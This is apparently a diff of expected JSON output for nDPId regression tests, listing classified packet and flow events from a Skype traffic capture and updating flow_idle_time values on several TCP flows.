+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1431970636573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970636573,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIgG7yCDj6Zk0JLpYLaASOJC0hQAAAgQFrAQCCApMX+vyPjGNXAEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1431970636573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970636573,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0faxAAEAGKfnAqAEinTg0HMggAbskulgt4+mZNYAQECwKzQAAAQEICj4xjj9MX+vy"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1431970636624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970636624,"pkt":"0NQSxnP1PBXCt3IOCABFAABDZH4AAEARkrjAqAEiwKgBAeUHADUAL+4jvNsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1431970636624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970636624,"pkt":"0NQSxnP1PBXCt3IOCABFAABDjbsAAEARaXvAqAEiwKgBAe0QADUAL\/kqxMsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1431970636780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970636780,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7VPMAAEARokvAqAEiwKgBAfrwADUAJ8Zq760BAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} 
@@ -100,17 +100,17 @@ 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1431970636919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970636919,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/1uEAAEARIFnAqAEiwKgBAebpADUAK335A20BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAAcAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1431970636919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636919,"pkt":"0NQSxnP1PBXCt3IOCABFAABLHJUAAEAR2pnAqAEiwKgBAeD4ADUANz9NJ5kBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAABAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1431970636919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970636919,"pkt":"0NQSxnP1PBXCt3IOCABFAABLIxUAAEAR1BnAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} 
-00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970637197,"flow_last_seen":1431970637197,"flow_idle_time":7440000,"flow_min_l4_payload_len":626,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":626,"midstream":1,"thread_ts_msec":1431970637197,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431970637197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":680,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":680,"pkt_l4_len":646,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAKaWZdAAEAGpyzAqAEiEaxkJMgbAbtPoUTcdzmC\/1AY\/\/+3vwAAFwMDAm2oQWYRyP748hMxFdAlY7EpLrN6kLughwvFpazZiqEW\/OZDc+EJPuHs5foI32Mtbk82IkMifsIYZr\/HgiWjp+qREkYwozIjDKA5RZr7pIvzcneHU5GjcfdA5I77GYqEliHbS2doHbevDGi5Wa7sLiRbXMA02aUJUp\/5WaIoIiwbOjRHFDMfCP5Z0\/J4lyMuhvKCpFQAO\/2wsDj\/MPbX5tlaL2EUm+IAfj6k00l5GWxpD7mtGhNIVcb8QkIXInLtd3tVvIfRqABdUPRdVk\/Oh8BYWO2hK2Jb5ytXLiGpVvyovjVj1ZXrjmeVOKzHYpnRvZZVE8aFr66jGGaGqwDLQKMakQCl3AK9obxhTX7luk8wNkyeGegCmXzvS4PBGTePDaeLJKSaHfRaaHCxBYP0IhnBKAC4N2jJ7aD0fuZCHAZyigwXRHRquVVgktLhkQLT0TrYI3l3qtmwkgNW3jlZmJ4UQcSOvOidllHsQvfEINIQuYffVEsqMVhXTG+aIO0hcL5jGoK\/2RywKg2\/ZDMiN+K9iSmWjEbwWSaN\/mkdtJTUxH4QcdrB9ORkHB0HW3rfKB\/TAafOnsKWi\/W1MbdmydveZGvrEmiyhj4NuiYhmxDSjj3\/4SRSy9HQ4Wxnu49AdVNnLycIUgrlledmcfb74m5EfYew5ExynB0kOvO\/AHcy3+wEfzmIbZkColXfZHhSlTlGEbBImUFDQWKlAJ0uaFUTw3Rq+PzDdQpZCLYV+ZYFyGNzuzH6vpabtmD1cwx0eABQdDvMezqNrzbAEH58b+AaG+h547E5oMr20bNoOdWJxGzZ\/kyAHLEf4gPOQ8A="} 
-01243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431970637197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAJg3uZAAEAGIhfAqAEiEaxkJMgbAbtPoUdOdzmC\/1AY\/\/82dAAAFwMDAjP0A3EPvtkTeRb8cFQp6pny5RM9Gnq4g+tevwtE\/WP22C8Uri1KdT3EBD+yCpMq\/b87CkoZm1+57ReFpRxcXXNbv8fmUZp4LfXGYAKK\/pxeeUvalXmICe2lECt2CjjUSRyUKdAGFZrNvCY2\/wZUpBfyYa\/+rlJcFwW3DXHOhnHdn4QEUo73+QW6pHlQGunmF0QmCQanElT8N\/bMb3RJnCc61l4RycIlVAF6Ksg5HA\/PKrYlV2XNEp7ur7RV1bzdvrRDp05wQjE83yF2+\/Zqwt4MRXssBShrwnb3hEuuMcZgQoFkEhY58EVGP3Ljm+RQgt\/RdUWzV6sjs4TAaqiNuIwUaqv+AfsmnLhujtd9Hc6+ZcJ9yMianW3O6MVxJ70OU7QnQRAi9B2JbRVg59CxbKPbN0bnPbMKE5N39MjxBkYm0yiOiyiHl0P3Xm8ltEin3BwY+GDkHhnXcwEeooC2S1\/4ktGCaZHkn\/k2Szc8GZnaGTWNnahHoy\/YkjOOXbjpA1O9h79pJ7aYrlRvBOm3f1m9CJ9BUs\/FU4sHmdZR0BiRQukoVRFc42QMlL7+4m6\/BxZQimsAq\/phHH03+2+AKsxWWcE29ndM6W1tas2nE7vfTX1S5m\/YyEFVMUyOo5pk7CkRxQvvBfhIGFzzhSjuVThl8iSAOkaF9xkVKPHRO\/JJKo90DAl86kKSFj0IAulnEwTwaRdIuubGGi2tTWanj85dryrFg8Q4mVv2pDFEoHGcuAXqGw=="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431970637339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1431970637339,"pkt":"PBXCt3IO0NQSxnP1CABFAAAo8lZAAO8GYd4RrGQkwKgBIgG7yBt3OYL\/T6FHTlAQnYx\/rgAAAAAAAAAA"} 
+00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970637197,"flow_last_seen":1431970637197,"flow_idle_time":7560000,"flow_min_l4_payload_len":626,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":626,"midstream":1,"thread_ts_msec":1431970637197,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1431970637197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":680,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":680,"pkt_l4_len":646,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAKaWZdAAEAGpyzAqAEiEaxkJMgbAbtPoUTcdzmC\/1AY\/\/+3vwAAFwMDAm2oQWYRyP748hMxFdAlY7EpLrN6kLughwvFpazZiqEW\/OZDc+EJPuHs5foI32Mtbk82IkMifsIYZr\/HgiWjp+qREkYwozIjDKA5RZr7pIvzcneHU5GjcfdA5I77GYqEliHbS2doHbevDGi5Wa7sLiRbXMA02aUJUp\/5WaIoIiwbOjRHFDMfCP5Z0\/J4lyMuhvKCpFQAO\/2wsDj\/MPbX5tlaL2EUm+IAfj6k00l5GWxpD7mtGhNIVcb8QkIXInLtd3tVvIfRqABdUPRdVk\/Oh8BYWO2hK2Jb5ytXLiGpVvyovjVj1ZXrjmeVOKzHYpnRvZZVE8aFr66jGGaGqwDLQKMakQCl3AK9obxhTX7luk8wNkyeGegCmXzvS4PBGTePDaeLJKSaHfRaaHCxBYP0IhnBKAC4N2jJ7aD0fuZCHAZyigwXRHRquVVgktLhkQLT0TrYI3l3qtmwkgNW3jlZmJ4UQcSOvOidllHsQvfEINIQuYffVEsqMVhXTG+aIO0hcL5jGoK\/2RywKg2\/ZDMiN+K9iSmWjEbwWSaN\/mkdtJTUxH4QcdrB9ORkHB0HW3rfKB\/TAafOnsKWi\/W1MbdmydveZGvrEmiyhj4NuiYhmxDSjj3\/4SRSy9HQ4Wxnu49AdVNnLycIUgrlledmcfb74m5EfYew5ExynB0kOvO\/AHcy3+wEfzmIbZkColXfZHhSlTlGEbBImUFDQWKlAJ0uaFUTw3Rq+PzDdQpZCLYV+ZYFyGNzuzH6vpabtmD1cwx0eABQdDvMezqNrzbAEH58b+AaG+h547E5oMr20bNoOdWJxGzZ\/kyAHLEf4gPOQ8A="} 
+01243{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1431970637197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"thread_ts_msec":1431970637197,"pkt":"0NQSxnP1PBXCt3IOCABFAAJg3uZAAEAGIhfAqAEiEaxkJMgbAbtPoUdOdzmC\/1AY\/\/82dAAAFwMDAjP0A3EPvtkTeRb8cFQp6pny5RM9Gnq4g+tevwtE\/WP22C8Uri1KdT3EBD+yCpMq\/b87CkoZm1+57ReFpRxcXXNbv8fmUZp4LfXGYAKK\/pxeeUvalXmICe2lECt2CjjUSRyUKdAGFZrNvCY2\/wZUpBfyYa\/+rlJcFwW3DXHOhnHdn4QEUo73+QW6pHlQGunmF0QmCQanElT8N\/bMb3RJnCc61l4RycIlVAF6Ksg5HA\/PKrYlV2XNEp7ur7RV1bzdvrRDp05wQjE83yF2+\/Zqwt4MRXssBShrwnb3hEuuMcZgQoFkEhY58EVGP3Ljm+RQgt\/RdUWzV6sjs4TAaqiNuIwUaqv+AfsmnLhujtd9Hc6+ZcJ9yMianW3O6MVxJ70OU7QnQRAi9B2JbRVg59CxbKPbN0bnPbMKE5N39MjxBkYm0yiOiyiHl0P3Xm8ltEin3BwY+GDkHhnXcwEeooC2S1\/4ktGCaZHkn\/k2Szc8GZnaGTWNnahHoy\/YkjOOXbjpA1O9h79pJ7aYrlRvBOm3f1m9CJ9BUs\/FU4sHmdZR0BiRQukoVRFc42QMlL7+4m6\/BxZQimsAq\/phHH03+2+AKsxWWcE29ndM6W1tas2nE7vfTX1S5m\/YyEFVMUyOo5pk7CkRxQvvBfhIGFzzhSjuVThl8iSAOkaF9xkVKPHRO\/JJKo90DAl86kKSFj0IAulnEwTwaRdIuubGGi2tTWanj85dryrFg8Q4mVv2pDFEoHGcuAXqGw=="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431970637339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1431970637339,"pkt":"PBXCt3IO0NQSxnP1CABFAAAo8lZAAO8GYd4RrGQkwKgBIgG7yBt3OYL\/T6FHTlAQnYx\/rgAAAAAAAAAA"} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1431970637372,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970637372,"pkt":"0NQSxnP1PBXCt3IOCABFAABLkYQAAEARZarAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1431970637372,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970637372,"pkt":"0NQSxnP1PBXCt3IOCABFAABLLWAAAEARyc7AqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1431970637443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970637443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6+FgAAEAR\/ubAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1431970638471,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970638471,"pkt":"0NQSxnP1PBXCt3IOCABFAABLoPEAAEARVj3AqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1431970638471,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970638471,"pkt":"0NQSxnP1PBXCt3IOCABFAABL\/NIAAEAR+lvAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1431970642408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970642408,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAABOkRoAAEARZRPAqAEiwKgB\/wCJAIkAOosFRXIBEAABAAAAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAE="} 00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
@@ -226,12 +226,12 @@ 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1431970648982,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970648982,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISMXYAAEARwrnAqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 
00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABADS1AAEAG4vXAqAEinTfrk8ginEEPp71\/AAAAALAC\/\/+7IQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 